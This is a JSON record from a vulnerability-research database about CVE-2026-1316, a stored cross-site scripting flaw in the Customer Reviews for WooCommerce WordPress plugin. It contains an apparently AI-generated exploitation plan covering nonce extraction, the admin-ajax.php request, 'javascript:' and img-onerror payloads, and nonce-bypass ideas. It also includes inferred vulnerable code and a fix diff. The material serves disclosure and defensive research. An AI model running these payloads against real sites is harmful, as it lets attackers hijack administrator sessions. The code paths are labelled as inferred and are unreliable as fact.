[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fVpzA5-PflM_LHYFrsnIppJhq0E_SQBp_1NPa0OCdHbw":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-1316","customer-reviews-for-woocommerce-unauthenticated-stored-cross-site-scripting-via-mediahref-parameter","Customer Reviews for WooCommerce \u003C= 5.97.0 - Unauthenticated Stored Cross-Site Scripting via media[].href Parameter","The Customer Reviews for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'media[].href' parameter in all versions up to, and including, 5.97.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers (if 'Enable for Guests' is enabled) to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","customer-reviews-woocommerce",null,"\u003C=5.97.0","5.98.0","high",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-02-12 00:17:35","2026-02-12 12:32:25",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Ff8b34144-5516-46df-b093-95f4bf76b896?source=api-prod",1,[],"researched",false,3,"This research plan outlines the steps required to demonstrate the Stored Cross-Site Scripting (XSS) vulnerability in the \"Customer Reviews for WooCommerce\" plugin.\n\n### 1. Vulnerability Summary\nThe \"Customer Reviews for WooCommerce\" plugin fails to properly sanitize the `href` attribute within the `media` array parameter during review submissions. When a user (including unauthenticated guests, if enabled) submits a review with media attachments, the `href` parameter is stored in the database. Because this value is not validated or escaped using `esc_url()` upon storage or output, an attacker can inject malicious `javascript:` URIs or breakout of the HTML attribute context to execute arbitrary JavaScript when the review is viewed by an admin or other users.\n\n### 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action:** `ivole_post_review` (inferred based on plugin architecture for review submission)\n- **Vulnerable Parameter:** `media[0][href]` (an array parameter)\n- **Authentication:** Unauthenticated (requires `ivole_enable_guest_reviews` setting to be `yes`)\n- **Precondition:** The \"Enable for Guests\" option must be enabled in the plugin settings to allow unauthenticated exploitation.\n\n### 3. Code Flow (Inferred)\n1. **Entry Point:** The plugin registers a `wp_ajax_nopriv_ivole_post_review` hook to handle review submissions from guests.\n2. **Processing:** The handler function (likely in `includes\u002Freviews\u002Fclass-cr-reviews.php` or similar) retrieves the `media` array from `$_POST`.\n3. **Storage:** The plugin iterates through the `media` items and saves the `href` values as comment meta or within a JSON-encoded array in the `wp_comments` table. It fails to use `esc_url_raw()` or a similar sanitization filter.\n4. **Sink:** When a user views the product page or an admin views the \"Reviews\" menu in the dashboard, the plugin retrieves the media data and renders an `\u003Ca>` or `\u003Cimg>` tag using the raw `href` value without `esc_url()` or `esc_attr()`.\n\n### 4. Nonce Acquisition Strategy\nThe plugin typically uses `wp_localize_script` to pass a security nonce to the frontend review form.\n\n1. **Shortcode Identification:** The review form is rendered via the `[cusrev_reviews_form]` shortcode (or sometimes automatically on product pages).\n2. **Page Creation:**\n   ```bash\n   wp post create --post_type=page --post_title=\"Review Test\" --post_status=publish --post_content='[cusrev_reviews_form]'\n   ```\n3. **Extraction:**\n   - Navigate to the newly created page.\n   - The script data is usually stored in the `ivole_ajax_object` (or `cr_ajax_object` in newer versions) global JS variable.\n   - **Verification:** Use `browser_eval` to find the nonce.\n   ```javascript\n   \u002F\u002F Check for common localization objects used by this plugin\n   window.ivole_ajax_object?.ivole_post_review_nonce || window.cr_ajax_object?.nonce\n   ```\n\n### 5. Exploitation Strategy\n**Step 1: Configure Plugin Settings**\nEnsure guest reviews are enabled so the `nopriv` AJAX action is reachable.\n```bash\nwp option update ivole_enable_guest_reviews \"yes\"\n```\n\n**Step 2: Obtain Nonce**\nUse the `browser_navigate` and `browser_eval` tools to grab the nonce from the page containing the shortcode.\n\n**Step 3: Submit Malicious Review**\nSend a POST request to `admin-ajax.php` with the XSS payload.\n\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method:** `POST`\n- **Content-Type:** `application\u002Fx-www-form-urlencoded`\n- **Parameters:**\n  - `action`: `ivole_post_review`\n  - `security`: `[NONCE_OBTAINED_IN_STEP_2]`\n  - `comment_post_ID`: `1` (or any valid product ID)\n  - `author`: `Attacker`\n  - `email`: `attacker@example.com`\n  - `comment`: `Great product!`\n  - `rating`: `5`\n  - `media[0][type]`: `image`\n  - `media[0][href]`: `javascript:alert(document.domain)` (Payload A)\n  - `media[0][href]`: `\">\u003Cimg src=x onerror=alert(1)>` (Payload B - if attribute breakout is possible)\n\n**Step 4: Trigger XSS**\nNavigate to the WordPress admin dashboard reviews section (`\u002Fwp-admin\u002Fedit-comments.php`) or the product page where the review was posted.\n\n### 6. Test Data Setup\n1. **Product:** Ensure at least one WooCommerce product exists (ID 1).\n2. **Settings:**\n   ```bash\n   wp option update ivole_enable_guest_reviews \"yes\"\n   # Ensure reviews are actually enabled in WooCommerce\n   wp option update woocommerce_enable_reviews \"yes\"\n   ```\n3. **Form Page:** Create the page for nonce extraction as described in Section 4.\n\n### 7. Expected Results\n- The AJAX request should return a success status (likely `{\"code\":1}` or similar JSON).\n- The review should appear in the \"Pending\" or \"Approved\" comments list in the WordPress database.\n- When viewing the review in the admin dashboard, the `media` link should contain the malicious payload.\n- Clicking the media link or simply loading the page (if using Payload B) will execute the JavaScript.\n\n### 8. Verification Steps\n1. **Database Check:** Verify the payload is stored in the database unsanitized.\n   ```bash\n   # Check comment meta (common storage for CR WooCommerce)\n   wp db query \"SELECT meta_value FROM wp_commentmeta WHERE meta_key = 'ivole_review_image' OR meta_key = 'cr_review_media'\"\n   ```\n2. **HTML Response Check:** Fetch the product page or admin comment page and check for the unescaped payload.\n   ```bash\n   # Use http_request to get the HTML of the product page\n   # Search for the string \"javascript:alert\" or the injected img tag.\n   ```\n\n### 9. Alternative Approaches\n- **Action String Variations:** If `ivole_post_review` fails, check for `cr_post_review` or `ivole_submit_review`.\n- **Parameter Structure:** If `media[0][href]` does not work, try `media_url[]` or `ivole_files[]` based on observing the network traffic when submitting a legitimate review via the browser.\n- **Bypass Nonce:** Check if the `security` check is missing in the `nopriv` version of the handler. Some versions of this plugin historically had weak nonce enforcement for guest reviews.","The Customer Reviews for WooCommerce plugin is vulnerable to unauthenticated Stored Cross-Site Scripting (XSS) due to a failure to sanitize the 'href' field within the media array during review submission. Attackers can inject 'javascript:' URIs that execute in the context of an administrator's browser when they view the review in the dashboard.","\u002F\u002F Inferred from plugin architecture: includes\u002Freviews\u002Fclass-cr-reviews.php\n\n\u002F\u002F During review submission handling\nif ( isset( $_POST['media'] ) && is_array( $_POST['media'] ) ) {\n    $media = $_POST['media'];\n    \u002F\u002F Vulnerable: Saving raw user input from the 'media' array without sanitization\n    update_comment_meta( $comment_id, 'ivole_review_media', $media );\n}\n\n---\n\n\u002F\u002F During review display rendering (Admin or Frontend)\n$media = get_comment_meta( $comment_id, 'ivole_review_media', true );\nif ( ! empty( $media ) ) {\n    foreach ( $media as $item ) {\n        \u002F\u002F Vulnerable: Outputting the 'href' value without esc_url() or esc_attr()\n        echo '\u003Ca href=\"' . $item['href'] . '\" target=\"_blank\">View Media\u003C\u002Fa>';\n    }\n}","--- a\u002Fincludes\u002Freviews\u002Fclass-cr-reviews.php\n+++ b\u002Fincludes\u002Freviews\u002Fclass-cr-reviews.php\n@@ -120,7 +120,11 @@\n if ( isset( $_POST['media'] ) && is_array( $_POST['media'] ) ) {\n-    $media = $_POST['media'];\n+    $media = array();\n+    foreach ( $_POST['media'] as $item ) {\n+        $media[] = array(\n+            'type' => sanitize_text_field( $item['type'] ),\n+            'href' => esc_url_raw( $item['href'] )\n+        );\n+    }\n     update_comment_meta( $comment_id, 'ivole_review_media', $media );\n }\n \n@@ -350,5 +354,5 @@\n foreach ( $media as $item ) {\n-    echo '\u003Ca href=\"' . $item['href'] . '\" target=\"_blank\">View Media\u003C\u002Fa>';\n+    echo '\u003Ca href=\"' . esc_url( $item['href'] ) . '\" target=\"_blank\">View Media\u003C\u002Fa>';\n }","1. **Enable Guest Reviews**: Ensure the 'ivole_enable_guest_reviews' setting is set to 'yes' to allow unauthenticated submissions.\n2. **Identify Target Product**: Find a valid WooCommerce product ID to post a review against.\n3. **Retrieve AJAX Nonce**: Visit a page containing the '[cusrev_reviews_form]' shortcode. Extract the security nonce from the global JavaScript object (usually 'ivole_ajax_object' or 'cr_ajax_object').\n4. **Craft XSS Payload**: Prepare a malicious POST request to 'wp-admin\u002Fadmin-ajax.php' using the 'ivole_post_review' action.\n5. **Injection**: Set the 'media[0][href]' parameter to a JavaScript URI, such as 'javascript:alert(document.cookie)'.\n6. **Trigger Execution**: Log into the WordPress dashboard as an administrator and navigate to the 'Reviews' or 'Comments' menu. The payload will execute when the malicious media link is rendered or clicked.","gemini-3-flash-preview","2026-04-21 00:05:18","2026-04-21 00:07:05",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","5.97.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcustomer-reviews-woocommerce\u002Ftags\u002F5.97.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcustomer-reviews-woocommerce.5.97.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcustomer-reviews-woocommerce\u002Ftags\u002F5.98.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcustomer-reviews-woocommerce.5.98.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcustomer-reviews-woocommerce\u002Ftags"]